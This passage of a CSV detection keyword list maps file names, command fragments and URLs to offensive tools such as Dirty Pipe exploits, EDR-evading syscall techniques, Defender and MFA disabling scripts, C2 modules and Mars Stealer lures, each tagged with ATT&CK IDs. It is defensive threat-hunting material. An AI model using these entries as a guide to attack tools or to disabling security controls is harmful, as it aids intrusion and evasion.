rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*dircreate2system.cpp*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*dircreate2system.exe*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*dircreate2system.sln*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*dircreate2system.vcxproj*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*DirCreate2System-main*","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","8","4","332","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" +"*Direct_Syscalls_Create_Thread.c*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*Direct_Syscalls_Create_Thread.exe*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*Direct_Syscalls_Create_Thread.sln*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. 
This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*Direct_Syscalls_Create_Thread.vcxproj*","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*DirectDLL_x64.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*DirectDLL_x86.dll*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - 
T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Directory-Traversal-Payloads.*","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","116","43","2023-09-11T17:20:51Z","2022-11-18T09:43:41Z" +"*Direct-Syscalls-vs-Indirect-Syscalls.git*","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","1","68","10","2023-05-24T04:23:37Z","2023-05-23T06:30:54Z" +"*dirkjan@sanoweb.nl*","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Credential Access","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","N/A","10","970","176","2023-09-06T05:50:30Z","2016-05-24T18:46:56Z" +"*dirkjanm/ldapdomaindump*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
+"*dirkjanm/PKINITtools*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dirkjanm/PrivExchange*","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","905","170","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" +"*dirscanner.py*","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","5","499","114","2023-09-27T04:40:54Z","2021-08-18T08:58:14Z" +"*dirscraper*","offensive_tool_keyword","dirscraper","Dirscraper is an OSINT scanning tool which assists penetration testers in identifying hidden. or previously unknown. directories on a domain or subdomain. 
This helps greatly in the recon stage of pentesting as it provide pentesters with a larger attack surface for the specific domain.","T1596 - T1530 - T1201","TA0040 - ","N/A","N/A","Information Gathering","https://github.com/Cillian-Collins/dirscraper","1","1","N/A","N/A","3","212","34","2019-02-24T12:22:47Z","2019-02-21T23:06:58Z" +"*dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*dirsearch*","offensive_tool_keyword","dirsearch","Dirsearch is a mature command-line tool designed to brute force directories and files in webservers.","T1110 - T1114 - T1100 - T1313","TA0001 - TA0007","N/A","N/A","Web Attacks","https://github.com/maurosoria/dirsearch","1","0","N/A","N/A","10","10325","2209","2023-10-03T11:22:52Z","2013-04-30T15:57:40Z" +"*dirTraversal.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*dirTraversal-nix.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*dirTraversal-win.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*dirty_sock*","offensive_tool_keyword","POC","dirty_sock: Linux Privilege Escalation (via snapd) In January 2019. current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/initstring/dirty_sock","1","1","N/A","N/A","7","640","159","2019-05-09T21:34:26Z","2019-02-12T06:02:06Z" +"*dirty_sock/archive/master.zip*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*dirtycow*","offensive_tool_keyword","dirtycow","Linux vulnerability name to go root CVE-2016-5195) Dirty COW est une vulnrabilit de scurit du noyau Linux qui affecte tous les systmes d'exploitation Linux. y compris Android. 
C'est un dfaut d'lvation de privilge qui exploite une condition de concurrence dans la mise en uvre de la copie sur criture dans le noyau de gestion de la mmoire","T1068 - T1055 - T1574.002","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tools","multiple pocs on github and others places ","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Dirty-Pipe/exploit-static*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","1","8","5","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z" +"*dirtypipe-exploit/blob/main/dirtypipe.c*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A",,"N/A",,, +"*-DirtyPipe-Exploits*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","N/A","N/A","5","453","129","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z" +"*dirwalk.py*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*disable_clamav.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*disable_clamav.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Disable_Privilege /Process:* /Privilege:*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*DisableAllWindowsSoftwareFirewalls*","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","98","13","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" +"*DisableAMSI(*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*DisableAntiPhishing*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*DisableAntiPhishing.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. 
","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*disableeventvwr/*.ps1*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" +"*DisableKerberosSigning*","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" 
+"*DisableMailboxAuditing.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*DisableMFA.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" +"*DisableRealtimeMonitoring $true*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*disableWinDef.cpp*","offensive_tool_keyword","WinDefenderKiller","Windows Defender Killer | C++ Code Disabling Permanently Windows Defender using Registry Keys","T1562.001 - T1055.002 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/S12cybersecurity/WinDefenderKiller","1","1","N/A","10","4","327","47","2023-07-27T11:06:24Z","2023-07-25T10:32:25Z" +"*Disabling ASLR *","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - 
Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" +"*discordapp.com/attachments/*/AnyDesk.exe*","offensive_tool_keyword","anydesk","Fake Anydesk distributed by discord - mars stealer","T1566 T1587","N/A","N/A","N/A","Malware","https://www.virustotal.com/gui/url/f83616f0f9cd2337ed40e22b0a675a99d58edf004b31645f56f28f020f5e4f46/detection","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*discordapp.com/attachments/*/BOINCPortable_*.exe*","offensive_tool_keyword","BOINC","Fake BOINC software distributed by discord - mars stealer","T1566 T1587","N/A","N/A","N/A","Malware","https://cyberint.com/wp-content/uploads/2022/02/Mars-Stealer-7.png.webp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Discovery_AccountDiscovery_GetNetDomainUser.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_AccountDiscovery_PowerView.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - 
T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_ApplicationWindowDiscovery_EnumApplication.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_Microphone_CallInfo.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_Microphone_camera.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_Microphone_record_mic.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_NetworkServiceScanning_ARPScan.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_NetworkServiceScanning_NbtScanByPython.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" 
+"*Discovery_NetworkServiceScanning_NextnetByPE.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_NetworkServiceScanning_PingByPython.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_NetworkServiceScanning_PortScanByPython.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*Discovery_NetworkServiceScanning_PortScanWithServiceByPython.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper 
